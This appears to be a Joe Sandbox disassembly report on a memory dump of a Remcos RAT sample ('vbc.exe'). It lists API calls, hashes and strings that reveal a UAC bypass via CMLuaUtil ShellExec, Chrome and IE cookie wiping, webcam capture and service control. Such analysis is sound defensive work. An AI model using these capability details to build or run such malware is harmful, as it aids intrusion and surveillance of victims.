                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                    • String ID: PkGNG
                    • API String ID: 313313983-263838557
                    • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                    • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                    APIs
                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                    • _wcslen.LIBCMT ref: 0041B763
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                    • API String ID: 37874593-122982132
                    • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                    • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                    APIs
                      • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                      • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                      • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                    • API String ID: 1133728706-4073444585
                    • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                    • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                    • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                    APIs
                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                    • _free.LIBCMT ref: 00450F48
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00450F53
                    • _free.LIBCMT ref: 00450F5E
                    • _free.LIBCMT ref: 00450FB2
                    • _free.LIBCMT ref: 00450FBD
                    • _free.LIBCMT ref: 00450FC8
                    • _free.LIBCMT ref: 00450FD3
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                    • int.LIBCPMT ref: 00411183
                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                    • String ID: (mG
                    • API String ID: 2536120697-4059303827
                    • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                    • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                    APIs
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                      • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                      • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                      • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue
                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    • API String ID: 1866151309-2070987746
                    • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                    • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                    APIs
                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                    • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                    APIs
                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe), ref: 004075D0
                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                    • CoUninitialize.OLE32 ref: 00407629
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitializeObjectUninitialize_wcslen
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                    • API String ID: 3851391207-382992119
                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                    • GetLastError.KERNEL32 ref: 0040BAE7
                    Strings
                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                    • [Chrome Cookies not found], xrefs: 0040BB01
                    • UserProfile, xrefs: 0040BAAD
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    • API String ID: 2018770650-304995407
                    • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                    • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                    APIs
                    • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AllocOutputShowWindow
                    • String ID: Remcos v$5.0.0 Pro$CONOUT$
                    • API String ID: 2425139147-2278869229
                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                    • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$PkGNG$mscoree.dll
                    • API String ID: 4061214504-213444651
                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                    APIs
                    • __allrem.LIBCMT ref: 0043AC69
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                    • __allrem.LIBCMT ref: 0043AC9C
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                    • __allrem.LIBCMT ref: 0043ACD1
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                    APIs
                    • Sleep.KERNEL32(00000000,?), ref: 004044C4
                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prologSleep
                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                    • API String ID: 3469354165-3054508432
                    • Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                    • Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    • API String ID: 4189289331-0
                    • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                    • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                    • String ID:
                    • API String ID: 493672254-0
                    • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                    • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID: PkGNG
                    • API String ID: 1036877536-263838557
                    • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                    • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                    APIs
                    • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • _free.LIBCMT ref: 0044824C
                    • _free.LIBCMT ref: 00448274
                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • _abort.LIBCMT ref: 00448293
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                    • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                    • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                    • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                    • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: PkGNG
                    • API String ID: 0-263838557
                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                    • String ID: PkGNG
                    • API String ID: 3360349984-263838557
                    • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                    • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
